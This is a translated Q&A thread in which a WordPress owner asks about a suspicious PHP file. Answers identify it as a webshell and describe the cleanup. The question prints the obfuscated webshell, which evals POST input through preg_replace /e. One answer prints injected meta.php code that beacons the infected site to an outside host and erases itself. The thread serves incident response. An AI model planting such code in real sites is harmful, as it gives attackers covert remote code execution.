WordPress网站被黑了？可疑的 PHP 文件答案

【问题标题】：WordPress Site hacked? Suspicious PHP fileWordPress网站被黑了？可疑的 PHP 文件
【发布时间】：2016-08-18 07:37:37
【问题描述】：

我发现了一个可疑的 PHP 文件 /wp-includes/mera.php

内容：

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

@preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); 会不会做一些恶意的事情？

【问题讨论】：

str_rot13('riny') 返回eval...
我不确定代码的作用，但该文件没有出现在任何 wordpress 文档中，因此除非您安装的应用程序之一使用它，否则它可能是恶意的。
该代码看起来可以运行任意代码。删除它，然后看看this codex page。
谢谢你们！我删除了文件并修复了 meta.php（请参阅下面的答案）。为什么 3 票投反对票？

标签： php wordpress security

【解决方案1】：

立即删除文件！

此PHP 代码是修改后的webshell。这些可能被用来攻击其他网站，并可能导致严重的法律问题！

删除后，您应该还修复让文件进入的漏洞！

【讨论】：

【解决方案2】：

是的，PHP 脚本允许在服务器上运行代码。

来源：http://wordpressvirusremoval.com/blog/execute-a-php-code-through-post-veriable-with-preg_replace-e-modifier/

通过使用干净的 WP tarball 进行比较，我发现 meta.php 已被修改：

988,1004d987
<
< check_meta();
< function check_meta(){
<     $jp = __FILE__;
<     $jptime = filemtime($jp);
<
<     if(time() >= 1472456239){
<         $jp_c = file_get_contents($jp);
<         if($t = @strpos($jp_c,"check_meta();")) {
<             $contentp = substr($jp_c,0,$t);
<             if(@file_put_contents($jp, $contentp)){
<                 @touch($jp,$jptime);
<             }
<         }
<     }
<     @file_get_contents("http://web.51.la:82/go.asp?svid=1&id=18944722&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/mera.php");
< }

仅供参考，以下是受感染文件的 md5sum：

898af479fe6cc3af461c1878763d19f4  ./wp-includes/meta.php
b657d7c9d9be52771750091df0751fda  ./wp-includes/mera.php

【讨论】：

【解决方案3】：

您应该在您的网站上安装类似 Wordfence 插件的东西，它会根据官方发布版本不断检查所有插件和主题文件夹。它还有助于防止像这样的危险文件上传。

【讨论】：